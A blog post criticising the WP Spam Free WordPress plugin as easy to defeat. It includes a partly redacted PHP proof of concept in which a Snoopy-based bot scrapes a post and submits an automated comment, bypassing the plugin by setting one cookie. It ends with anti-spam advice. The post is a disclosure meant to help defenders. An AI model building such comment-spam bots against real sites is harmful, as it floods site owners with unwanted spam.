There’s only one problem: The plugin is way, way, waaay too easy to defeat.
Now, I’m no spammer. But I do know how to program bots. I use them to do routine maintenance on my wiki . When I saw these claims, I thought to myself, “Lots of people are going to download this bot thinking they’re safe from spam, but it won’t last long.”
The first half of that prediction was right: Over 2000 people have downloaded the plugin since it was released a month and a half ago.
I expect the second half of my prediction to be right soon. Here’s why: All that a spammer needs to do to defeat this plugin is add one line of code to their bots. Here comes the technical explanation:
Proof of Concept
When you criticize code, it’s standard to give a proof of concept. Well, here’s mine. I spent a few minutes this morning seeing whether I could post an automated comment to my test blog that was running Scott’s plugin. An experienced spammer would be able to defeat the plugin in only a few minutes.
I program my wiki’s bots in PHP using the Snoopy class to send and receive cookies and form variables. So the code starts with including the snoopy class. Then, I use snoopy to fetch a blog post’s contents. A regular expression finds the comment posting URL, and another finds the post ID that I want to comment on. I define an array of variables that I want to post. Now, if the blog didn’t run WP Spam Free, I’d be done at this point. But to defeat the plugin, all I do is add the one line near the bottom. Take a look:
<?php // use snoopy $snoopy = new Snoopy; // the WP post we want to comment on automatically. $url = 'http://blog.example.com/2008/01/some-blog-post/'; // scrape the URL $snoopy->fetch( $url ); // find the URL we need to post to preg_match( '~ (redacted) ~Usi', $snoopy->results, $matches ); $submitUri = $matches; // Define an array of vars we want to post. Start with the standard WP post vars: $post = array(); $post['author'] = 'Proof of Concept'; $post['email'] = 'firstname.lastname@example.org'; $post['url'] = ''; $post['submit'] = 'Add Your Comment'; // Now find the post's ID preg_match( '~ (redacted) ~i', $snoopy->results, $matches ); $post['comment_post_ID'] = $matches; // write your comment $post['comment'] = "This is the comment that I will post automatically."; // everything up until now is what I would need if I were automatically posting on an unprotected blog. // So what do I need to do to defeat the SpamFree plugin? ///////////////// // To defeat the WP Spam-Free plugin, only this ONE LINE is necessary. $snoopy->cookies[ (redacted) ] = ' (redacted) '; //////////////// // submit the comment $snoopy->submit( $submitUri, $post ); ?>
Note that only one extra line of code was necessary to defeat the plugin. If they haven’t already, spammers will soon start adding that line as a standard feature of their bots.
Even if Scott made the plugin more difficult to beat (by, for example, having that cookie’s value change instead of being the same all the time), it would require only one regular expression for me to find the JS value and post it using Snoopy. Enjoy it while it lasts, folks, but if this plugin enters widespread usage, expect the spammers to compensate.
What is to be done?
Plugins like Akismet, Spam Karma, and Bad Behavior have proved relatively robust. The easiest defense against spam is to use one or more of them. If you want better defenses, add something unique to your blog. Scott’s technique would work great if his blog were the only one using it. But if thousands of blogs use the same technique, the spammers will adjust their tactics.